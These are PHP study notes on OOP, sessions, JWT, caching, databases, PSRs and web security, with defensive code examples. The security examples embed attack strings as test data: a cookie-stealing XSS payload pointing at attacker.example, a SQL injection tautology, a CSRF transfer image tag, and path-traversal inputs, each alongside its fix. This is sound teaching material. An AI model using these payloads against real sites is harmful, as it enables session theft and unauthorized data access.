PHP Questions
OOP
Dependency injection: Dependency Injection (DI) is a design pattern that promotes the principle of inversion of control. Instead of an object being responsible for creating its dependencies (like other objects or services it needs), these dependencies are "injected" into the object from the outside, usually via constructor or method arguments.
Benefits:
Improved separation of concerns.
Easier unit testing since dependencies can be mocked.
Decouples classes, leading to more maintainable and flexible code.
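Constructor injection as an added example (not code from the original notes). The Mailer interface, SmtpMailer, ArrayMailer and PasswordResetService are hypothetical names chosen for illustration; the point is that the service never constructs its own collaborator, so the same class runs against a real mailer in production and an in-memory fake in a test:

```php
<?php
declare(strict_types=1);

// Added example: constructor injection. All class/interface names are
// constructed for this illustration.
interface Mailer
{
    public function send(string $to, string $subject, string $body): void;
}

final class SmtpMailer implements Mailer
{
    public function __construct(private string $host) {}

    public function send(string $to, string $subject, string $body): void
    {
        // Real delivery would go here; not executed in this demo.
        mail($to, $subject, $body);
    }
}

// Test double: records messages instead of delivering them.
final class ArrayMailer implements Mailer
{
    /** @var array<int, array{to: string, subject: string, body: string}> */
    public array $sent = [];

    public function send(string $to, string $subject, string $body): void
    {
        $this->sent[] = ['to' => $to, 'subject' => $subject, 'body' => $body];
    }
}

final class PasswordResetService
{
    // The dependency is injected; this class never calls `new SmtpMailer()`,
    // so it neither knows nor cares which implementation it receives.
    public function __construct(private Mailer $mailer) {}

    public function requestReset(string $email): string
    {
        $token = bin2hex(random_bytes(32));   // 256-bit CSPRNG token
        $this->mailer->send($email, 'Password reset', "Token: {$token}");
        return $token;
    }
}

// Production wiring (not executed here):
// $service = new PasswordResetService(new SmtpMailer('smtp.example.test'));

// Test wiring: the same class, exercised without a network.
$mailer  = new ArrayMailer();
$service = new PasswordResetService($mailer);
$token   = $service->requestReset('alice@example.test');

if (count($mailer->sent) !== 1 || !str_contains($mailer->sent[0]['body'], $token)) {
    throw new LogicException('mailer was not called as expected');
}
echo "sent '{$mailer->sent[0]['subject']}' to {$mailer->sent[0]['to']}\n";
```

The fake also keeps secrets out of test logs: the token only ever lands in an array the test controls.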
Abstract class vs interface
abstract class:
cannot be instantiated directly; must be extended
may mix abstract (signature only) and concrete (implemented) methods
may declare properties, static and non-static members, and a constructor
a class can extend only one (abstract) class
interface:
a contract: method signatures and constants only, no implementation and no instance properties
is implemented, not extended, by classes; a class can implement multiple interfaces, and an interface can extend several interfaces
Composition: Composition involves building complex objects by combining simpler ones. In OOP, this means using instances of other classes as members in your class rather than inheriting from them.
Compose over inheritance:
is the principle that classes should favor polymorphic behavior and code reuse by their composition (by containing instances of other classes that implement the desired functionality) over inheritance from a base or parent class
In the context of PHP and OOP, understanding and applying these principles can lead to more maintainable, flexible, and robust software designs.
Why I don't use "inheritance" in my code
Aggregation: a has-a relationship where the contained object can exist independently of the container (a Team holds Players that outlive it); in composition the parts' lifetime is tied to the whole.
final: a final class cannot be extended and a final method cannot be overridden; use it to close classes that are not designed as extension points.
static: members that belong to the class rather than to an instance (shared by all objects, accessed with ::).
ReflectionClass: a built-in class and core part of PHP's reflection API; it lets code introspect classes (methods, properties, constants, constructor parameters, attributes) at run time.
Dynamic Analysis: Useful when you're working with dynamic data or third-party libraries and need to understand the structure.
Automated Testing. testing frameworks use it
Annotations, Dependency Injection Containers, Documentation
Polymorphism: Polymorphism allows objects of different classes to respond differently to the same message.
abstract classes
interfaces
method overriding (run-time): a subclass redefines a parent method; which implementation runs is decided when the opcodes are executed (run-time: when the opcodes are executed)
method overloading: PHP has no compile-time signature overloading like Java or C++ (compile time in PHP: script parsed and converted to opcodes). What the PHP manual calls "overloading" is dynamic: __call/__callStatic/__get/__set handle inaccessible members at run-time; the same effect is usually achieved with optional or variadic parameters and union types.
Cookies
Cookies are a mechanism that allows a server to store small pieces of data on a client's system (typically, a browser) so that the data can be retrieved in subsequent requests. This enables functionalities like sessions, user preferences, analytics, and more.
Few Important Points:
HttpOnly: the cookie is still sent with HTTP requests but cannot be read from JavaScript (document.cookie), so a successful cross-site scripting (XSS) attack cannot exfiltrate it. It does not prevent XSS itself.
Secure: the cookie is transmitted only over HTTPS; set it on anything carrying sensitive data, above all the session cookie.
SameSite: controls whether the browser attaches the cookie to cross-site requests (Strict, Lax or None). Lax or Strict mitigates CSRF. All three flags are set with the options array of setcookie() or, for the session cookie, via session.cookie_secure / session.cookie_httponly / session.cookie_samesite.
Sessions
Sessions in PHP provide a way of maintaining state information about a user's interactions with a website
start session, store data in $_SESSION, retrieve data from $_SESSION, destroy session
Session ID:
When a session starts, PHP generates a unique identifier called the "session ID". This ID is typically stored in a cookie on the user's browser (named PHPSESSID by default). On subsequent requests, PHP retrieves the session ID from the cookie and uses it to find and load the corresponding session data from the server.
Session storage: By default, session data is serialized and stored in files on the server (php.ini > session.save_path). Sessions can instead be stored in databases or caching systems like Memcached or Redis (session.save_handler, or a custom SessionHandlerInterface), providing better performance and scalability.
Session security:
Session Hijacking: If an attacker gets access to a session ID, they can impersonate the user. HTTPS prevents session IDs from being intercepted in transit; HttpOnly cookies stop them being read by injected script.
Session Fixation: An attacker sets a user's session ID to a known value and waits for the user to authenticate. They can do that by embedding a link in a phishing email with the session ID in the URL, or by using cross-site scripting (XSS) to set the session ID in the user's cookie.
Regenerating the session ID upon login (session_regenerate_id(true)) and accepting IDs only from cookies (session.use_only_cookies, session.use_strict_mode) mitigate this.
Session Timeout: Setting a timeout for sessions can enhance security by limiting the time an attacker has if they gain access to a user's session.
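The cookie flags, fixation defence and idle timeout from the cookie and session sections above, pulled together in one bootstrap. This is an added example, not code from the original notes; the function names and the 15-minute idle limit are illustrative choices rather than PHP defaults:

```php
<?php
declare(strict_types=1);

// Added example: hardened session bootstrap. Function names and the
// 15-minute idle limit are illustrative, not PHP or framework defaults.

const IDLE_LIMIT_SECONDS = 15 * 60;

function startSecureSession(): void
{
    // Flags for the PHPSESSID cookie: HTTPS only, hidden from JavaScript,
    // not attached to cross-site requests (mitigates CSRF).
    session_set_cookie_params([
        'lifetime' => 0,          // session cookie, discarded when the browser closes
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    // Refuse IDs supplied in the URL, and reject IDs the server never issued;
    // together these close the classic fixation vectors.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_strict_mode', '1');
    session_start();

    // Idle timeout: discard data untouched for too long and issue a fresh ID.
    $lastSeen = $_SESSION['_last_seen'] ?? time();
    if (time() - $lastSeen > IDLE_LIMIT_SECONDS) {
        session_unset();
        session_regenerate_id(true);
    }
    $_SESSION['_last_seen'] = time();
}

function loginUser(int $userId): void
{
    // Replace the pre-authentication ID so a fixated ID is worthless, and
    // delete the old session data (true) so the old ID cannot be resumed.
    session_regenerate_id(true);
    $_SESSION['user_id']           = $userId;
    $_SESSION['_authenticated_at'] = time();
}

function logoutUser(): void
{
    $_SESSION = [];
    // Expire the cookie in the browser as well as destroying server-side data.
    $params = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $params['path'],
        'secure'   => $params['secure'],
        'httponly' => $params['httponly'],
        'samesite' => $params['samesite'],
    ]);
    session_destroy();
}

// Usage in a login handler, after the password check has succeeded:
// startSecureSession();
// loginUser($user->id);
```

Calling session_regenerate_id(true) on every privilege change (login, role switch), not just at login, keeps the same property: an ID an attacker knew before the change is useless afterwards.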
Sessions in distributed systems:
Sticky Sessions: Load balancers can be configured to direct a user to the same server for the duration of their session.
Centralized Session Storage: a shared store (database, Redis, Memcached) that every application server reads from, so any server can serve any request.
Distributed Session Storage: Systems like Redis Cluster or distributed databases can distribute session data across multiple nodes, ensuring high availability and scalability.
JSON Web Tokens (JWT): Rather than storing user session data on the server, it's encoded into a token that's sent to the client. On subsequent requests, the client sends the token, which the server can verify.
JWT
Definition: JSON Web Token (RFC 7519) is a compact, URL-safe way of transmitting claims between parties as a signed (and optionally encrypted) JSON object.
A JWT looks like xxxxx.yyyyy.zzzzz and consists of three base64url-encoded parts separated by dots:
Header: the type of the token (JWT) and the signing algorithm (alg).
Payload: the "claims" of the token. Claims are statements about an entity (typically the user) plus metadata such as exp (expiry), iat, iss and aud.
Signature: computed over the encoded header and payload with the algorithm named in the header. With HMAC SHA256 the signature is HMACSHA256(base64url(header) + "." + base64url(payload), secret).
Tokens are signed either with a shared secret (HMAC, e.g. HS256) or with a private key whose public key the verifiers hold (RSA/ECDSA, e.g. RS256/ES256). Signing gives integrity and authenticity, not confidentiality: the payload is only encoded, so anyone holding the token can read it. The verifier must pin the algorithm it expects rather than trusting the header.
JWTs are used for authentication and authorization purposes
Advantages:
Statelessness: Since the JWT contains all the information about the user, there's no need for the server to store session data. This allows for scalable applications as there's no need to store session information in memory.
Decentralization: Authentication can be done by any service, as long as they have the appropriate secret or public key.
Performance: Since JWT allows for stateless authentication, there's no need to query a database to check for a valid session every time a user makes a request.
Concerns:
Security: Storing the JWT on the client side in localStorage makes it readable by any script on the page, so an XSS bug leaks the token. An HttpOnly cookie is safer storage, but then CSRF protection is needed again.
Size: JWTs can become large if too much data is stored in them, leading to performance issues in environments where headers should be small, like in mobile development.
State: Since JWTs are stateless, revoking (blacklisting) a token before its expiration needs server-side state (a denylist keyed by jti), which gives up part of the statelessness.
Token Expiry: Since JWTs carry an exp claim, systems need to handle renewal (short-lived access tokens plus a refresh token). If a JWT is stolen, it can be misused until it expires, so keep lifetimes short.
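The signature computation and the verification checks described above (pinned algorithm, constant-time comparison, exp), as an added HS256 example that is not part of the original notes. The secret and the fixed clock value are constructed for the demo; a real deployment loads the secret from configuration and uses time():

```php
<?php
declare(strict_types=1);

// Added example: minimal HS256 JWT issue/verify. Secret and clock are constructed.

function base64UrlEncode(string $data): string
{
    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64UrlDecode(string $data): string
{
    $padded  = $data . str_repeat('=', (4 - strlen($data) % 4) % 4);
    $decoded = base64_decode(strtr($padded, '-_', '+/'), true);
    if ($decoded === false) {
        throw new InvalidArgumentException('invalid base64url');
    }
    return $decoded;
}

function jwtIssue(array $claims, string $secret): string
{
    $header  = base64UrlEncode(json_encode(['alg' => 'HS256', 'typ' => 'JWT'], JSON_THROW_ON_ERROR));
    $payload = base64UrlEncode(json_encode($claims, JSON_THROW_ON_ERROR));
    // signature = HMAC-SHA256(header . "." . payload, secret), raw bytes then base64url
    $signature = base64UrlEncode(hash_hmac('sha256', "$header.$payload", $secret, true));
    return "$header.$payload.$signature";
}

/** Verifies algorithm, signature and expiry; returns the claims or throws. */
function jwtVerify(string $token, string $secret, int $now): array
{
    $parts = explode('.', $token);
    if (count($parts) !== 3) {
        throw new RuntimeException('malformed token');
    }
    [$header64, $payload64, $signature64] = $parts;

    // Pin the algorithm. Letting the header choose it allows "alg: none"
    // or HMAC/RSA confusion attacks.
    $header = json_decode(base64UrlDecode($header64), true, 512, JSON_THROW_ON_ERROR);
    if (($header['alg'] ?? null) !== 'HS256') {
        throw new RuntimeException('unexpected alg');
    }

    $expected = hash_hmac('sha256', "$header64.$payload64", $secret, true);
    // hash_equals is constant-time; a plain === leaks timing information.
    if (!hash_equals($expected, base64UrlDecode($signature64))) {
        throw new RuntimeException('bad signature');
    }

    $claims = json_decode(base64UrlDecode($payload64), true, 512, JSON_THROW_ON_ERROR);
    if (!isset($claims['exp']) || !is_int($claims['exp']) || $claims['exp'] <= $now) {
        throw new RuntimeException('token expired or has no exp');
    }
    return $claims;
}

// Demo with a constructed secret and a fixed clock.
$secret = 'example-only-secret-use-32-random-bytes-in-production';
$now    = 1_700_000_000;
$token  = jwtIssue(['sub' => '42', 'role' => 'user', 'exp' => $now + 900], $secret);
echo 'verified sub=', jwtVerify($token, $secret, $now)['sub'], "\n";

// Tampering with the payload (role escalation) invalidates the signature.
[$h, $p, $s] = explode('.', $token);
$forgedPayload = base64UrlEncode(json_encode(['sub' => '42', 'role' => 'admin', 'exp' => $now + 900]));
try {
    jwtVerify("$h.$forgedPayload.$s", $secret, $now);
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

In production use a maintained library (e.g. firebase/php-jwt or lcobucci/jwt) rather than hand-rolled code, but configure it the same way: one allowed algorithm, a key per algorithm, and mandatory exp/iss/aud checks.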
Caching
PHP
Opcode Caching:
When PHP code is executed, it's first compiled into opcodes, which are then executed by the Zend Engine.
Without caching, these opcodes are discarded after execution, meaning the next time the same PHP script is run, it needs to be compiled again.
Opcode caching retains the compiled opcodes in memory so that they can be reused without recompilation in subsequent runs.
Popular Tools:
OPcache: Integrated and shipped with PHP starting from PHP 5.5. It caches opcodes in memory, reducing the need to reload and parse scripts on each request.
Object Caching:
Used to store objects, database query results, or other data structures.
Useful for reducing the overhead of costly database operations or complex computations.
Popular Tools:
APCu: in-memory key/value store for PHP, shared by the workers of one PHP-FPM pool (or one mod_php server) but local to that machine
Memcached: distributed in-memory object cache
Redis: in-memory data structure server (strings, hashes, lists, sets) with optional persistence; usable as cache, session store and queue
If the load is very high, look towards Memcached or Redis, since they scale across servers.
Note that when running PHP as a plain (Fast)CGI application inside your web server, every PHP process has its own cache, so APCu data is not shared between worker processes (PHP-FPM shares it within a pool, but never across hosts). In these cases consider Memcached or Redis instead, as they are not tied to the PHP processes.
Full Page Caching:
Instead of caching small parts or objects, the entire output of a page can be cached.
Reduces the need to execute PHP scripts and database queries entirely for frequently accessed pages.
Can be implemented at the PHP level or using tools like Varnish.
Popular Tools:
Varnish Cache: An HTTP accelerator designed for content-heavy dynamic web sites. It's not PHP-specific but is commonly used with PHP applications.
Database Query Caching: Some databases have built-in query caches; MySQL's was removed in 8.0 because it scaled badly, so cache query results in the application (APCu/Redis) instead.
Content Delivery Network (CDN): CDNs can cache static assets (like CSS, JS, and images) closer to the user
Browser Caching:
By setting appropriate HTTP headers, you can instruct the client's browser to cache certain assets locally, reducing the need for repeated downloads.
Security
escaping data: transforming characters that have a special meaning in the output context (HTML, JavaScript, SQL, shell, URL) into a representation that is treated as text rather than as code. Escaping is output-side and context-specific: htmlspecialchars() for HTML is useless inside a <script> block.
sanitizing data: cleaning user input by removing or encoding harmful content in strings (e.g. stripping tags, normalizing). Sanitizing is input-side and lossy; prefer validation (reject what does not match the expected format) plus output escaping.
SQL Injection:
Description: Occurs when untrusted input from a form field, URL parameter, cookie or header is concatenated into an SQL statement, so the attacker controls part of the query. A classic example: the input ' OR '1'='1 placed into WHERE name = '$name' would return all the users; other payloads read other tables, modify data or, depending on the driver, stack further statements.
Solution: Use prepared statements and parameterized queries (PDO, or prepared statements in MySQLi). The query structure is sent to the database separately from the values, so input can never be parsed as SQL; this is stronger than escaping. Identifiers (table/column names, ORDER BY direction, LIMIT) cannot be bound as parameters and must be checked against an allowlist.
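The tautology injection beside its prepared-statement fix, as an added example (not from the original notes). It uses an in-memory SQLite database so it runs offline; the users table and its two rows are constructed for the demo:

```php
<?php
declare(strict_types=1);

// Added example: SQL injection against in-memory SQLite, then the fix.
// Table and rows are constructed for the demo.

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // let the driver bind parameters itself
]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
$pdo->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");

// VULNERABLE: user input is concatenated into the SQL text.
function findUserVulnerable(PDO $pdo, string $name): array
{
    $sql = "SELECT name, role FROM users WHERE name = '$name'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: the statement is compiled with a placeholder; the value travels
// separately and can never change the query structure.
function findUserSafe(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Identifiers cannot be parameters: allowlist them instead.
function listUsersSorted(PDO $pdo, string $column): array
{
    $allowed = ['name', 'role'];
    if (!in_array($column, $allowed, true)) {
        throw new InvalidArgumentException('unknown sort column');
    }
    return $pdo->query("SELECT name, role FROM users ORDER BY $column")->fetchAll(PDO::FETCH_ASSOC);
}

$payload = "' OR '1'='1";   // classic tautology: WHERE name = '' OR '1'='1'

echo 'vulnerable query returned ', count(findUserVulnerable($pdo, $payload)), " rows\n";
echo 'prepared query returned ',   count(findUserSafe($pdo, $payload)),       " rows\n";
echo 'sorted by role: ', json_encode(listUsersSorted($pdo, 'role')), "\n";
```

Also run the application's database user with the least privilege it needs (no DROP, no FILE, no access to other schemas), so that an injection that does slip through cannot escalate.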
Cross-Site Scripting (XSS):
Description: Attackers inject malicious scripts into content that's then served to users. The browser can't tell the difference between legitimate and malicious scripts, so the malicious script gets executed.
A typical payload reads document.cookie (which may authenticate the session) and exfiltrates it by redirecting the browser to the attacker's URL with the cookie as a query parameter. HttpOnly cookies blunt this particular theft, but not other XSS impacts such as keylogging, forged requests in the victim's session or page defacement.
Solution: Escape data, validate input, sanitize data, implement Content Security Policy (CSP) headers.
When a CSP is implemented, the browser will not load content or execute script from sources that are not explicitly mentioned in the policy.
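Escaping the same payload for each output context, plus a nonce-based CSP as the second layer, as an added example not taken from the original notes. The helper names and the sample comment string are constructed:

```php
<?php
declare(strict_types=1);

// Added example: context-aware output escaping plus a CSP header.
// Helper names (e, eJs, eUrl) and the sample comment are constructed.

// HTML body and attribute context: encode & < > " and '.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// JavaScript context: JSON-encode and hex-escape the characters that could
// close the <script> element or be read as HTML.
function eJs(mixed $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// URL query-string context.
function eUrl(string $value): string
{
    return rawurlencode($value);
}

// Defence in depth: only same-origin scripts and inline scripts carrying this
// response's nonce may run, so a missed escape does not become code execution.
// (Headers must be sent before any output.)
$nonce = base64_encode(random_bytes(16));
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-$nonce'; "
     . "object-src 'none'; base-uri 'none'; frame-ancestors 'none'");

$comment = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable rendering: the payload is emitted verbatim and the browser runs it.
$vulnerable = "<p>$comment</p>";

// Escaped for the context each value lands in.
$safeHtml = '<p>' . e($comment) . '</p>';
$safeAttr = '<input value="' . e($comment) . '">';
$safeJs   = '<script nonce="' . e($nonce) . '">var c = ' . eJs($comment) . ';</script>';
$safeUrl  = '/search?q=' . eUrl($comment);

echo "VULNERABLE:\n$vulnerable\n\nESCAPED:\n$safeHtml\n$safeAttr\n$safeJs\n$safeUrl\n";
```

Template engines such as Twig escape HTML by default; the JavaScript and URL contexts still need the dedicated filters, and raw/|raw output should be treated as a code-review flag.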
Cross-Site Request Forgery (CSRF):
Description: An attacker tricks a user into performing actions they didn't intend to by creating specially crafted hyperlinks or forms. The user might inadvertently submit a form that changes their email address, password, or other sensitive data.
Example: The user logs into example.com, which uses cookies for authentication. Once the user is logged in, the browser automatically sends the authentication cookie with every request to example.com. The user, while still logged in, visits malicious.com, a site set up by an attacker to send a request to example.com. This could be something as simple as an image tag like <img src="https://example.com/transaction?amount=100&recipient=attacker">, where the "src" attribute is actually a request to transfer money. The user's browser makes the request to example.com because it is just an image tag as far as the browser is concerned; since the user is authenticated, the browser also includes the authentication cookie for example.com. The example.com server receives the request and cannot tell it was not intentionally sent by the user; after all, it has the authentication cookie. If the server is not protected against CSRF, it processes the request and performs the transaction on behalf of the user.
Solution: Use anti-CSRF tokens: random, per-session (or per-form) values known only to the user's session and the server, embedded in forms and checked on every state-changing request. The attacker's site cannot read the token because of the same-origin policy, so it cannot replicate a valid request. Complement tokens with SameSite cookies and never perform state changes on GET requests.
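The synchronizer-token defence described above, as an added example that is not part of the original notes. The function names and the _csrf field name are assumptions; the demo emulates the form round-trip in one script:

```php
<?php
declare(strict_types=1);

// Added example: synchronizer-token CSRF protection. Function names and the
// `_csrf` form field are illustrative choices.

function csrfToken(): string
{
    // One token per session, 256 bits from the CSPRNG, hex so it embeds safely.
    if (empty($_SESSION['_csrf'])) {
        $_SESSION['_csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['_csrf'];
}

function csrfField(): string
{
    return '<input type="hidden" name="_csrf" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrfCheck(array $post): void
{
    $sent  = $post['_csrf'] ?? '';
    $known = $_SESSION['_csrf'] ?? '';
    // hash_equals avoids timing side-channels on the comparison.
    if ($known === '' || !is_string($sent) || !hash_equals($known, $sent)) {
        http_response_code(403);
        throw new RuntimeException('CSRF token mismatch');
    }
}

session_start();

// 1. Rendering the transfer form embeds the token.
echo '<form method="post" action="/transaction">', csrfField(), ' ...</form>', "\n";

// 2. A legitimate submission carries the token the server issued.
csrfCheck(['_csrf' => csrfToken(), 'amount' => '100', 'recipient' => 'bob']);
echo "legitimate request accepted\n";

// 3. malicious.com cannot read the victim's token (same-origin policy), so its
//    forged request lacks it or carries a guess, and is rejected.
try {
    csrfCheck(['amount' => '100', 'recipient' => 'attacker']);
} catch (RuntimeException $e) {
    echo 'forged request rejected: ', $e->getMessage(), "\n";
}
```

For JSON APIs the same check can read the token from a custom header (e.g. X-CSRF-Token) that a cross-site form post cannot set; frameworks such as Symfony's CsrfTokenManager implement exactly this pattern.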
Session Hijacking:
Description: An attacker steals a user's browser session cookie, which is used to authenticate the user on a website, and uses this cookie to gain unauthorized access to the user's account.
Solution: Regenerate session IDs after login to prevent session fixation, and periodically regenerate the session ID. Always use secure, HTTP-only cookies. Implement proper session timeout and ensure your application uses HTTPS to prevent session sniffing.
File Inclusion Vulnerabilities:
Description: Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities occur when an application uses user-controllable data to decide which script to include, letting attackers run code on the server (or read arbitrary files). RFI depends on allow_url_include; LFI is often combined with log poisoning or php://filter to turn a file read into code execution.
Solution: Limit the files that can be included to a fixed allowlist keyed by a name the user picks, preferably avoiding user-driven inclusion altogether. Never pass user input directly to include, require, fopen, file_get_contents, etc.
Directory traversal: A directory (or path) traversal attack exploits insufficient validation of user-supplied file names (../ sequences, absolute paths, null bytes, symlinks) to reach files outside the intended directory. An affected application can be exploited to gain unauthorized access to the file system. Canonicalise with realpath() and verify the result still starts with the intended base directory.
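Both defences from the file-inclusion and traversal entries above, as an added example not taken from the original notes: an allowlisted include where the request chooses a key rather than a path, and a realpath()-based containment check for file names that really must come from input. The page list, directory names and the sample file are constructed:

```php
<?php
declare(strict_types=1);

// Added example: allowlisted include and traversal-proof file read.
// PAGES, the templates directory and the sample file are constructed.

// 1. Allowlist: the request supplies a key, never a path, so neither ../
//    nor a php:// or http:// wrapper can ever reach include.
const PAGES = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function renderPage(string $requested): string
{
    if (!array_key_exists($requested, PAGES)) {
        return 'not found';
    }
    ob_start();
    include __DIR__ . '/templates/' . PAGES[$requested];
    return (string) ob_get_clean();
}

// 2. When a file name must come from input, canonicalise and confirm the
//    result is still inside the intended directory.
function readUserFile(string $baseDir, string $name): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    // Null bytes and anything that is not a bare file name are rejected up front.
    if (str_contains($name, "\0") || basename($name) !== $name) {
        throw new InvalidArgumentException('invalid file name');
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath resolves "..", "." and symlinks; the prefix check then catches
    // escapes such as ../../etc/passwd or a symlink pointing outside $base.
    if ($target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('path escapes base directory');
    }
    return file_get_contents($target);
}

// Demo with a temporary directory and a constructed file.
$base = sys_get_temp_dir() . '/userfiles_' . bin2hex(random_bytes(4));
mkdir($base);
file_put_contents("$base/report.txt", "quarterly numbers\n");

echo 'ok: ', readUserFile($base, 'report.txt');

foreach (['../../etc/passwd', "report.txt\0.jpg", '/etc/hostname', 'missing.txt'] as $bad) {
    try {
        readUserFile($base, $bad);
    } catch (Throwable $e) {
        echo 'blocked ', json_encode($bad), ': ', $e->getMessage(), "\n";
    }
}

unlink("$base/report.txt");
rmdir($base);
```

realpath() returns false for files that do not exist, which is why the check also rejects missing files; if you need to create new files, apply the same prefix check to the canonicalised parent directory instead.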
Man in the middle:
Description: A type of attack where an adversary intercepts, and potentially alters, the communication between two parties who believe they are talking directly to each other.
Solution: HTTPS everywhere (with HSTS), valid and up-to-date certificates, the Secure flag on cookies, and strict certificate validation in server-to-server clients (never disable CURLOPT_SSL_VERIFYPEER or verify_peer in stream contexts).
Database
Migrations: Use doctrine migrations, consider application downtime
Optimize queries: use EXPLAIN, add indexes, select the columns you need instead of SELECT *, remove N+1 queries, limit the data retrieved (pagination)
Prepared statements: Feature provided by many database access libraries, including PHP's PDO (PHP Data Objects) and MySQLi. They allow you to prepare an SQL statement with placeholders, which are later bound to actual values before executing the query; the values never become part of the SQL text.
Ensure integrity: use strong data types, use constraints (NOT NULL, UNIQUE, foreign keys), validate data, use prepared statements, backups, logs, monitor and test
Seeding: fixtures, SQL dumps
doctrine vs eloquent
Active Record vs. Data Mapper:
Doctrine: Implements the Data Mapper pattern. Here, the persistence logic is decoupled from the domain objects. You work with entities as plain objects, and the ORM takes care of persisting them, often using a separate layer (e.g., EntityManager in Doctrine).
Eloquent: Implements the Active Record pattern. This means that a model instance is directly tied to a database row, and you can perform CRUD operations on the model instance itself.
N+1 in ORM
The N+1 problem is a common performance issue in applications that use an Object-Relational Mapping (ORM) system. It arises when an application inefficiently retrieves related data from a database, leading to an excessive number of queries.
Explanation: Imagine you have two related entities (e.g., Post and Comment). When you want to display all posts along with their comments, the naive and straightforward approach might be:
Fetch all posts.
For each post, fetch its comments.
This leads to 1 query for the posts plus N queries for the comments of N posts, thus the term "N+1".
Without Optimization (N+1 problem):
You execute 1 query to retrieve the 10 blog posts.
You execute a separate query for each of the 10 blog posts to retrieve its comments. (i.e., 10 queries)
So, you end up executing 1 (for the posts) + 10 (for the comments) = 11 queries.
With Optimization (Using eager loading):
You execute 1 query to retrieve the 10 blog posts.
You execute 1 additional query to retrieve the comments for all 10 posts at once.
Now, you only execute 2 queries in total.
How to solve the N+1 problem:
Eager loading
Doctrine (Symfony): use a JOIN plus addSelect (or JOIN FETCH) in DQL/QueryBuilder so the relation is hydrated in the same query, or set fetch="EAGER" in the mapping. Eloquent (Laravel): Post::with('comments').
PSRs
Coding style, autoloading , caching, logging, client, container, event dispatcher
PSR-1: Basic Coding Standard — It specifies the basic coding standards for code styling and namespacing in PHP.
PSR-3: Logger Interface — It describes a common interface for logging libraries, enabling compatibility between different logging implementations.
PSR-4: Autoloader — It improves upon PSR-0, providing a specification for autoloading classes from file paths.
PSR-6: Caching Interface — It specifies an interface for caching libraries, encouraging collaboration and interoperability.
PSR-7: HTTP Message Interface — It describes common interfaces for HTTP messages, as described in the RFC 7230 and RFC 7231, allowing developers to create applications using a standardized method for HTTP requests and responses.
PSR-11: Container Interface — It standardizes the way frameworks and libraries utilize dependency injection containers.
PSR-12: Extended Coding Style Guide — It extends and expands upon PSR-2, providing a more comprehensive coding style guide for PHP.
PSR-13: Hypermedia Links — It offers a standard for hypermedia link definitions used in representations of web-based data systems.
PSR-14: Event Dispatcher — It details the design of event dispatchers, allowing components to interact with each other in a standardized way.
PSR-15: HTTP Handlers — It specifies interfaces for handling server requests and responses, defining how HTTP requests should be handled in server-side PHP.
PSR-16: Simple Cache — It introduces a standardized way to implement caching, simplifying the process across various libraries.
PSR-17: HTTP Factories — It specifies the standard for HTTP message factories, which simplifies the creation of objects defined in PSR-7.
PSR-18: HTTP Client — It standardizes the interface for HTTP clients, promoting interoperability across various PHP HTTP client implementations.
PSR-20: Clock (accepted in 2022) — It defines a ClockInterface for retrieving the current time, which makes time-sensitive code testable by injecting a fixed or frozen clock.
Composer
Composer is a dependency management tool for PHP.
1. composer.json: the heart of a Composer-managed project (requirements, autoload rules, scripts). composer.lock pins the exact resolved versions; commit it and deploy with composer install so every environment gets identical code.
2. Autoloading: Composer also generates an autoloader file, which helps PHP find and load the classes from the libraries. By including vendor/autoload.php in your PHP script, you can use the libraries without manually including them.
3. Other Commands and Features:
composer require [package-name], composer remove [package-name]
composer show: Display detailed information about the installed packages.
composer dump-autoload: Regenerate the autoloader files. Useful when you add new classes or change the autoloading configuration.
composer audit: Check the installed packages against known security advisories (Composer 2.4+).
4. Packagist: Packagist is the default package repository for Composer.
5. Benefits of Composer:
Centralized and Consistent Dependency Management
Autoloading
Semantic Versioning
Magic methods
Predefined methods that are used to perform certain operations based on particular actions.
__construct(): This method is called when an object is created from a class.
Useful for initializing properties or running any code required at the time of object creation.
__destruct(): Called when the object is destroyed or the script execution ends.
Useful for cleanup, like closing database connections.
__get($property): Triggered when trying to access an inaccessible or non-existent property.
Useful for overloading property reads or returning computed values.
__set($property, $value): Triggered when trying to set a value to an inaccessible or non-existent property.
Can be used to enforce property constraints or trigger events when properties are modified.
__call($method, $args): Invoked when a non-existent or inaccessible instance method is called (calling the object itself like a function triggers __invoke instead).
Useful for dynamic method dispatch ("overloading" in PHP's sense).
__callStatic($method, $args): Triggered when invoking inaccessible or non-existent static methods.
Useful for static method overloading.
__isset($property): Called by isset() or empty() for inaccessible or non-existent properties. Helps in checking if a property is set even if it's protected or private.
__unset($property): Called by unset() for inaccessible properties. Allows custom behavior when unsetting properties.
__toString(): Called when the object is used in a string context (like echo). Useful to represent the object as a string, for easy debugging or logging.
